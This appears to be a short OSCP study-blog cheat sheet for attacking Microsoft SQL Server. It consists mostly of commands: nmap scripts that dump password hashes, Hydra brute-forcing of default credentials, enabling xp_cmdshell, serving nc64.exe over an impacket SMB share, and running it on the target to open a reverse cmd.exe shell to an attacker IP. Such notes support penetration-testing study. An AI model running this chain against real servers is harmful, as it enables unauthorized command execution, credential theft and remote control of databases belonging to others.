MSSQL OSCP

  • Post author:
  • Post category:OSCP

MSSQL Services

mssql-vulnerability – Nmap can be leveraged to scan MsSQL for Known vulnerabilities.

 

Example Syntax:

 

nmap -vv -sV -Pn -p [PORT] –script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes –script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa [IP]

 

mssql-default – Hydra can be utilized to check the MsSQL database for default credentials.

 

Example Syntax:

 

hydra -s [PORT] -C ./wordlists/mssql-default-userpass.txt -u -f [IP] mssql

 

 

Using MSSQL xp_cmdshell to get reverse shell

 

EXEC sp_configure ‘show advanced options’, 1;

Reconfigure;

EXEC sp_configure ‘xp_cmdshell’,1

Reconfigure;

 

 

SQL>

SQL> xp_cmdshell “whoami”

output

 

——————————————————————————–

 

nt service\mssql$sqlexpress

 

NULL

 

 

Start smb share

Sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .

 

xp_cmdshell¬† “copy \\192.168.49.80\tools\nc64.exe c:\temp”

 

SQL> xp_cmdshell “c:\temp\nc64.exe 192.168.49.80 80 -e cmd.exe”